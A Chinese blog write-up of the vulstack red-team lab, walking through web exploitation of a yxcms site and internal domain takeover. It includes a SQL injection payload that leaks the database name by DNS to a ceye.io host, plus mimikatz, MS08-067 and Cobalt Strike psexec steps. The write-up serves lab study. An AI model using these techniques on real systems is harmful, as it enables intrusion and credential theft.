一、环境搭建:
1、根据作者公开的靶机信息整理:
虚拟机初始所有统一密码:hongrisec@2019
 
因为登陆前要修改密码,改为了panda666...
 
2、虚拟网卡网络配置:
①Win7双网卡模拟内外网:
外网:192.168.1.43,桥接模式与物理机相通
内网:192.168.52.143
 
还需要修改以下网络配置,将网段设置好
 
②Win2003只有内网:
内网:192.168.52.138,仅主机模式
 
③Win2008只有内网:
内网:192.168.52.141,仅主机模式
 
④攻击机:
kali:192.168.1.2
win10:192.168.1.7
 
然后启动Phpstudy即可开启web服务
 
 
二、Web层渗透:
1、信息收集:
①服务和端口
 
访问80端口的http服务,发现php探针,收集一些有用的信息:
绝对路径:C:/phpStudy/WWW
 
②目录扫描
发现phpmyadmin、beifen.rar文件
 
访问phpmyadmin页面,手动试了常见的弱口令,root/root进去了
 
查看是否可以intoutfile直接写入一句话,但secure_file_priv为NULL所以不能指定写入的路径,先放一下,看看备份文件有什么可利用的
SHOW VARIABLES LIKE '%secure%'
 
访问文件路径,把备份文件下载
 
发现是yxcms的源码备份文件
 
并且通过升级日志,知道版本为1.2.1
 
 
2、漏洞挖掘:
①存储型XSS:
留言板处,输入xss payload,点击留言:
 
②信息泄露+弱口令进后台:
 
访问后台地址,输入默认账号密码:admin/123456,查看留言是,发现刚才的xss payload执行了,get√ N0.1
 
③任意文件写入漏洞:
前台模板-->管理模板文件
 
点击新建
 
直接写入一句话木马,然后保存
 
根据备份文件,找到模板文件的存放路径
 
访问文件,成功getshell
 
④delete注入:
勾选删除碎片时,用burp抓包
 
加入单引号发现会报错
 
网上找的payload,具体就不进行测试了:
and if((select load_file(concat('\\\\',(select database()),'.xxxx.ceye.io\\abc'))),1,1))--
 
 
⑤还可以通过phpmyadmin全局日志getshell,具体方法也很简单,就不演示了
 
 
三、内网渗透
1、win7本机信息收集
已经成功getshell了,使用蚁剑连接,准备进行内网渗透,为了熟悉MSF,所以打算使用MSF进行
①上传木马并执行
成功拿到meterpreter的会话
 
直接利用getsystem提权(因为没有uac限制)
 
②内网信息收集
发现有域环境:god.org,内网ip为192.168.52.143,DNS服务器(一般是域控):192.168.52.138
 
添加路由进行横向移动
 
利用frp搭建socks代理
上传frp客户端及配置文件到目标机器
 
启动服务端
 
这里我利用蚁剑直接执行客户端,因为msf执行有点问题没解决...
 
探测域内存活主机:
run windows/gather/enum_ad_computers
 
域控列表
run windows/gather/enum_domains
 
所有存活主机
 
dump当前机器的所有hash
load mimikatz
msv
 
kerberos
 
信息整理:
域控2008:OWA.god.org 192.168.52.138
域机器2003:root-tvi862ubeh.god.org 192.168.52.141
web服务器win7:192.168.52.143
 
密码hash整理:
Administrator:ntlm:bd692185c355484e973645bd6a8e4505 明文:panda666...
 
 
2、横向移动拿下域控:
①ms08067(注意payload使用bind),成功拿下win2003域机器
 
②利用CobaltStrike的psexec拿下域控
1.将msf的会话派生给CS,然后抓取凭证,利用smb beacon上线域控
 
成功拿下域控beacon
 
2.转储域内所有hash
 
四、总结:
①通过目录扫描得到备份文件,利用yxcms历史漏洞getshell
②利用msf进行常规内网信息收集
③添加路由+frp搭建socks代理进行内网横向移动
④通过ms08-067漏洞拿下03域机器
⑤利用CS的smb beacon成功拿下域控权限

vulstack红队评估(一)的更多相关文章

  1. vulstack红队评估(五)

    一.环境搭建: ①根据作者公开的靶机信息整理 虚拟机密码: Win7: heart 123.com    #本地管理员用户 sun\Administrator dc123.com    #域管用户,改 ...

  2. vulstack红队评估(四)

    一.环境搭建: ①根据作者公开的靶机信息整理 虚拟机密码: ubuntu: ubuntu:ubuntu   win7: douser:Dotest123   Win2008 DC: administr ...

  3. vulstack红队评估(三)

    一.环境搭建: ①根据作者公开的靶机信息整理 没有虚拟机密码,纯黑盒测试...一共是5台机器,目标是拿下域控获取flag文件   ②虚拟机网卡设置 centos双网卡模拟内外网: 外网:192.168 ...

  4. vulstack红队评估(二)

    一.环境搭建: 1.根据作者公开的靶机信息整理: 靶场统一登录密码:1qaz@WSX     2.网络环境配置: ①Win2008双网卡模拟内外网: 外网:192.168.1.80,桥接模式与物理机相 ...

  5. ATK&CK红队评估实战靶场 (一)的搭建和模拟攻击过程全过程

    介绍及环境搭建 靶机地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2 官方靶机说明: 红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练 ...

  6. ATT&CK红队评估实战靶场(一)

    靶机下载地址 http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 攻击拓扑如下 0x01环境搭建 配置两卡,仅主机模式192.168.52.0网段模拟内 ...

  7. Red Team 指南-第1章 红队和红队概述

    第1章 红队和红队概述 贡献者:Tony Kelly @infosectdk # 翻译者 BugMan 什么是红队?它来自哪里? 红队的起源是军事起源.人们意识到,为了更好地防御, 需要攻击自己的防御 ...

  8. 红队(red team)

    红队资源相关 https://threatexpress.com/redteaming/resources/ 红队相关技术 https://github.com/bluscreenofjeff/Red ...

  9. ATT&CK实战系列 红队实战(一)————环境搭建

    首先感谢红日安全团队分享的靶机实战环境.红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习.视频教程.博客三位一体学习. 靶机下载地址:http://vulnstack.qiyuanxue ...

随机推荐

  1. node进程间通信

    作为一名合格的程序猿/媛,对于进程.线程还是有必要了解一点的,本文将从下面几个方向进行梳理,尽量做到知其然并知其所以然: 进程和线程的概念和关系 进程演进 进程间通信 理解底层基础,助力上层应用 进程 ...

  2. python常见面试题讲解(八)提取不重复的整数

    题目描述 输入一个int型整数,按照从右向左的阅读顺序,返回一个不含重复数字的新的整数. 输入描述: 输入一个int型整数 输出描述: 按照从右向左的阅读顺序,返回一个不含重复数字的新的整数 示例1 ...

  3. 个人工具,编辑器visual studio code

    个人收集的使用方法:简化版 主要基于基础web前端开发,visual studio code教程——基础使用.扩展插件安装使用 下载地址: https://visualstudio.microsoft ...

  4. 【MobileNet-V1】-2017-CVPR-MobileNets Efficient Convolutional Neural Networks for Mobile Vision Applications-论文阅读

    2017-CVPR-MobileNets Efficient Convolutional Neural Networks for Mobile Vision Applications Andrew H ...

  5. AES实现财务数据的加密解密存储

    需求背景 众所周知,金融行业有各种各样的财务报表,有些报表涉及到公司财务或经营相关的敏感数据,需要进行加密存储,只有掌握密钥的用户才能看到解密后的数据.注意,这里所说的加密并不是针对整个数据库或者表全 ...

  6. ASP.NET通过EntityFramework CodeFirst创建数据库

    Number1 新建一个项目 给新项目添加一个实体数据模型 选择第三个 这里我创建两个有关系的类,也就是有外键关系的数据库表 using System; using System.Collection ...

  7. Java实现 蓝桥杯 算法训练 求平方和

    试题 算法训练 求平方和 问题描述 请用函数重载实现整型和浮点习型的两个数的平方和计算 输入格式 测试数据的输入一定会满足的格式. 2 2(2行2列,第1行整型,第2行浮点型) 输出格式 要求用户的输 ...

  8. Java实现 LeetCode 733 图像渲染(DFS)

    733. 图像渲染 有一幅以二维整数数组表示的图画,每一个整数表示该图画的像素值大小,数值在 0 到 65535 之间. 给你一个坐标 (sr, sc) 表示图像渲染开始的像素值(行 ,列)和一个新的 ...

  9. Java实现 LeetCode 710 黑名单中的随机数(黑白名单)

    710. 黑名单中的随机数 给定一个包含 [0,n ) 中独特的整数的黑名单 B,写一个函数从 [ 0,n ) 中返回一个不在 B 中的随机整数. 对它进行优化使其尽量少调用系统方法 Math.ran ...

  10. Java中TreeSet的详细用法

    第1部分 TreeSet介绍 TreeSet简介 TreeSet 是一个有序的集合,它的作用是提供有序的Set集合.它继承于AbstractSet抽象类,实现了NavigableSet, Clonea ...